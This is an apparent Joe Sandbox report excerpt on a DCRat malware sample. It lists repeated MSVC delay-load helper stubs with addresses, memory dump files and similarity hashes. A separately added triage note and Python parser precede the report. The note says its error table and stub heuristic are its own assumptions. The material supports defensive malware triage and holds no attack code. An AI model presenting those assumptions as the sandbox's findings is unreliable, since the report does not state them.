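                                                                                              Triage note on the entries above (added here as an example; this is not part of the Joe Sandbox report and not code from the sample). Every function listed calls ___delayLoadHelper2@8 and, via subcall 0032F9E9, RaiseException with status C06D0057. That status decodes as severity 3 (error), facility 0x6D (FACILITY_VISUALCPP, the facility the MSVC delay-load helper uses for VcppException) and Win32 error 0x57 (ERROR_INVALID_PARAMETER), so these are compiler-generated delay-load thunks, not sample-specific logic. Several entries also share one Instruction ID (c0ddf8673e2c...) while carrying different Opcode IDs, which is why their Uniqueness Score is -1.00%. The script below parses entries in the shape shown on this page, decodes the RaiseException status, collapses functions that share an Instruction ID, and flags the delay-load stubs so they can be skipped when hunting for the real DCRat code. The SAMPLE text is constructed from entries on this page; the Win32 error-name table and the stub heuristic are this example's own assumptions, not something the report states.

```python
"""Collapse MSVC delay-load stubs in a Joe Sandbox function list (added example)."""
import re
from collections import defaultdict

# Constructed sample: three entries copied in the shape of this report's list.
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Similarity
• Opcode ID: 483478398b14689786cfcb2a3c3c5b95d9d9d2ddb54e900c8513fd8fba0e55e0
• Instruction ID: 037f708dd43c015ee7da8d52319abcbb4855fbf7f87f44ffabc7d25c79e8c117
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Similarity
• Opcode ID: b03cee7e5de3f3aed435f773838288d3bc42f9538e914e21dfa6294484c79650
• Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Similarity
• Opcode ID: 14e354f31a348c573ef57aaeca33394f6f65b78b724987dc8a0e9b92e148ba23
• Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
"""

FACILITY_VISUALCPP = 0x6D  # facility used by VcppException() in the MSVC delay-load helper
# Win32 error codes the delay-load helper raises (assumed table for this example).
WIN32_ERRORS = {0x57: "ERROR_INVALID_PARAMETER", 0x7E: "ERROR_MOD_NOT_FOUND", 0x7F: "ERROR_PROC_NOT_FOUND"}

# "Part of subcall function XXXX: Name.MODULE(args)" or plain "Name.MODULE ref: ..."
API_RE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]+: )?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
)
ID_RE = re.compile(r"^(Opcode ID|Instruction ID): ([0-9a-f]{64})$")


def decode_status(code: int) -> dict:
    """Split an NTSTATUS-style code into severity, facility and error fields."""
    facility = (code >> 16) & 0x0FFF
    error = code & 0xFFFF
    return {
        "severity": code >> 30,
        "facility": facility,
        "error": error,
        "error_name": WIN32_ERRORS.get(error, "unknown"),
        "is_vcpp_delayload": facility == FACILITY_VISUALCPP,
    }


def parse_entries(text: str) -> list:
    """Return one dict per 'APIs' block: called APIs plus Opcode/Instruction IDs."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "opcode_id": None, "instruction_id": None}
            entries.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("• "):
            line = line[2:]
        m = ID_RE.match(line)
        if m:
            cur["opcode_id" if m.group(1) == "Opcode ID" else "instruction_id"] = m.group(2)
            continue
        m = API_RE.match(line)
        if m and m.group("module").isupper():  # module names are upper-case (KERNEL32, DELAYIMP)
            cur["apis"].append((m.group("name"), m.group("module"), m.group("args")))
    return entries


def raise_exception_codes(entry: dict) -> list:
    """First argument of every RaiseException call in the entry, as ints."""
    return [int(args.split(",")[0], 16)
            for name, _, args in entry["apis"] if name == "RaiseException" and args]


def is_delayload_stub(entry: dict) -> bool:
    """Heuristic: delay-load helper present and every raised status is a VcppException."""
    names = {name for name, _, _ in entry["apis"]}
    codes = raise_exception_codes(entry)
    return "___delayLoadHelper2@8" in names and all(decode_status(c)["is_vcpp_delayload"] for c in codes)


def group_by_instruction_id(entries: list) -> dict:
    """Map Instruction ID -> list of Opcode IDs; identical code at different addresses collapses."""
    groups = defaultdict(list)
    for e in entries:
        groups[e["instruction_id"]].append(e["opcode_id"])
    return dict(groups)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for iid, opcodes in group_by_instruction_id(parsed).items():
        print(f"{iid[:12]}... x{len(opcodes)}")
    print(decode_status(0xC06D0057))
    print("delay-load stubs:", sum(is_delayload_stub(e) for e in parsed), "of", len(parsed))
```

                                                                                              Run it against a saved copy of the function list and anything that is not flagged as a stub, or that belongs to an Instruction ID seen only once, is where the sample-specific code lives.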
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 0b7479091f3c9279baad13e1e992b561060fb4c82413ffc3586aebf6e358ec64
• Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
• Opcode Fuzzy Hash: 0b7479091f3c9279baad13e1e992b561060fb4c82413ffc3586aebf6e358ec64
• Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 189691701d701728625afa356ec7d9ae8f72a5187ec3608a12788435fc69a707
• Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
• Opcode Fuzzy Hash: 189691701d701728625afa356ec7d9ae8f72a5187ec3608a12788435fc69a707
• Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: f4ceabae29c297faa49c488263468c3bd449aacf874b7ffa536bf66183134e28
• Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
• Opcode Fuzzy Hash: f4ceabae29c297faa49c488263468c3bd449aacf874b7ffa536bf66183134e28
• Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 9add70e7793982fccd48eb6848334d294a71342bcd4ce3f71f308840a7d65296
• Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
• Opcode Fuzzy Hash: 9add70e7793982fccd48eb6848334d294a71342bcd4ce3f71f308840a7d65296
• Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: e96ee55911f15e6e3fb30795f728606891a909039fd9faece371db8e7b89d028
• Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
• Opcode Fuzzy Hash: e96ee55911f15e6e3fb30795f728606891a909039fd9faece371db8e7b89d028
• Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F33D
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: e9be8be63629058cf69e6694d20835ba5a8142d2a913b749e5e72b302c7b4468
• Instruction ID: c0ddf8673e2c2cb2a60dcd4c42b33ae22b72cd3f096b26c5b04c7f59f384384d
• Opcode Fuzzy Hash: e9be8be63629058cf69e6694d20835ba5a8142d2a913b749e5e72b302c7b4468
• Instruction Fuzzy Hash: C8A001AA6A9123BD368AA2617D27D7A02BCC4D4B65334893EF50288581A9802C8665B1
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 68412345ee1ee3b316534e33f8dc6998dd6299dc3de55e677368bb04fc38c8e9
• Instruction ID: c93a7bc19ea5eb4554313be5510aa29ed2c2bfb38b7d887fb0d08b5fe78402b1
• Opcode Fuzzy Hash: 68412345ee1ee3b316534e33f8dc6998dd6299dc3de55e677368bb04fc38c8e9
• Instruction Fuzzy Hash: A9A001E66A9522BE320A6A627D27D7B126CC4D9BA5330893AF44289481AA806C851071
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 55df61b9515e6b4e78fe7a63e289f9ec680f3e9ee35788914c03dcb256c9b3d5
• Instruction ID: c93a7bc19ea5eb4554313be5510aa29ed2c2bfb38b7d887fb0d08b5fe78402b1
• Opcode Fuzzy Hash: 55df61b9515e6b4e78fe7a63e289f9ec680f3e9ee35788914c03dcb256c9b3d5
• Instruction Fuzzy Hash: A9A001E66A9522BE320A6A627D27D7B126CC4D9BA5330893AF44289481AA806C851071
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d7084ead02764c2abd495823a4bef8fdb26de1f6a6c2a790f44e8e255984d147
                                                                                              • Instruction ID: a24cc84b42b2ba283859e60e2ad8f11ead88c309bce5db712a1fde1b2c3280bb
                                                                                              • Opcode Fuzzy Hash: d7084ead02764c2abd495823a4bef8fdb26de1f6a6c2a790f44e8e255984d147
                                                                                              • Instruction Fuzzy Hash: 87A011E22A80203E320A2A223E23C3B022CC0C0B20330803AF00088080AA802C800030
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0118e9a7469e45cd79745617c6f592fead8441addc708da2c1af03790b7a47fe
                                                                                              • Instruction ID: c93a7bc19ea5eb4554313be5510aa29ed2c2bfb38b7d887fb0d08b5fe78402b1
                                                                                              • Opcode Fuzzy Hash: 0118e9a7469e45cd79745617c6f592fead8441addc708da2c1af03790b7a47fe
                                                                                              • Instruction Fuzzy Hash: A9A001E66A9522BE320A6A627D27D7B126CC4D9BA5330893AF44289481AA806C851071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3ec4f82acc302384325de47bb38dff2db20d52561c55a63a876d79e41fc7dee2
                                                                                              • Instruction ID: c93a7bc19ea5eb4554313be5510aa29ed2c2bfb38b7d887fb0d08b5fe78402b1
                                                                                              • Opcode Fuzzy Hash: 3ec4f82acc302384325de47bb38dff2db20d52561c55a63a876d79e41fc7dee2
                                                                                              • Instruction Fuzzy Hash: A9A001E66A9522BE320A6A627D27D7B126CC4D9BA5330893AF44289481AA806C851071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F556
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7f7adcf75fd6aaa545158a89d0b338f56b9338d762db31c0d036f5e02bec696d
                                                                                              • Instruction ID: c93a7bc19ea5eb4554313be5510aa29ed2c2bfb38b7d887fb0d08b5fe78402b1
                                                                                              • Opcode Fuzzy Hash: 7f7adcf75fd6aaa545158a89d0b338f56b9338d762db31c0d036f5e02bec696d
                                                                                              • Instruction Fuzzy Hash: A9A001E66A9522BE320A6A627D27D7B126CC4D9BA5330893AF44289481AA806C851071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5fdcd8bed10f221f4ac3038d4d9b4b0753e907673d578ec6976a5cce54be956d
                                                                                              • Instruction ID: 88c78bbdd7ef98d0d6d1a2eac7df86ba312afc1f9b50cff7bfe58313bddd59f9
                                                                                              • Opcode Fuzzy Hash: 5fdcd8bed10f221f4ac3038d4d9b4b0753e907673d578ec6976a5cce54be956d
                                                                                              • Instruction Fuzzy Hash: 8CA001A66B9122BD320A62617D27D7A026CC4D8B693348A3AF40298495A9812C851571
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 264e9bdf7560bc1007e896c7aafc6d2c1c26e4d05c54777921e665c0f9bb71bf
                                                                                              • Instruction ID: 3f33f9db15b3d859e84e3f9e6312ce4bab6348728fdd1763954b71bfc692f809
                                                                                              • Opcode Fuzzy Hash: 264e9bdf7560bc1007e896c7aafc6d2c1c26e4d05c54777921e665c0f9bb71bf
                                                                                              • Instruction Fuzzy Hash: 4CA002F66B9221BE320B66657EA7D7B127CD8D0F79330893FF401DC481A9806DC51071
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 59695e73f3f32f15946caa6fab1e43036f05002a65baca9bf79e53e84cc0fdf3
                                                                                              • Instruction ID: 88c78bbdd7ef98d0d6d1a2eac7df86ba312afc1f9b50cff7bfe58313bddd59f9
                                                                                              • Opcode Fuzzy Hash: 59695e73f3f32f15946caa6fab1e43036f05002a65baca9bf79e53e84cc0fdf3
                                                                                              • Instruction Fuzzy Hash: 8CA001A66B9122BD320A62617D27D7A026CC4D8B693348A3AF40298495A9812C851571
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0032F6AB
                                                                                                • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
                                                                                                • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 491448e5504fce1c972f5d7e4dfbc2a4bec804bf3dd75b9b2e85507790cb3f17
                                                                                              • Instruction ID: 88c78bbdd7ef98d0d6d1a2eac7df86ba312afc1f9b50cff7bfe58313bddd59f9
                                                                                              • Opcode Fuzzy Hash: 491448e5504fce1c972f5d7e4dfbc2a4bec804bf3dd75b9b2e85507790cb3f17
                                                                                              • Instruction Fuzzy Hash: 8CA001A66B9122BD320A62617D27D7A026CC4D8B693348A3AF40298495A9812C851571
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0032F70C
  • Part of subcall function 0032F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0032FA5C
  • Part of subcall function 0032F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0032FA6D
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 4c139685af4dde5bfd22e27ee6cc4ee61f38835ff4dbb2d538a87aaabbf06dd6
